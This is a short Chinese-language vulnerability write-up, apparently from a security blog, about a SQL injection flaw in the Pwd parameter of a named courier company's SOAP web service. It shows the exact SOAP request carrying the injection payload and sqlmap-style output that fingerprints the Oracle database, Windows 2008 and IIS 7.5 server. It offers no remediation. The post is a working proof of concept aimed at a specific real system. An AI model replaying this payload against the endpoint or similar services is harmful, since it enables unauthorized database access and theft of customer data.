接口地址: http://api.zto.cn/WebService.asmx?wsdl Pwd参数存在SQL注入 漏洞
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<urn:Search>
<urn:Userid>1</urn:Userid>
<urn:Pwd>-1'</urn:Pwd>
<urn:SrtjobNo>1</urn:SrtjobNo>
</urn:Search>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
版本信息: [INFO] the back-end DBMS is Oracle web server operating system: Windows 2008 web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5 back-end DBMS: Oracle
oracle库名: |
-
上一篇: Web应用安全检测和防御机制 – 网站安全 – 自学p
下一篇: 360网站宝/安全宝/加速乐及其他类似产品防护绕过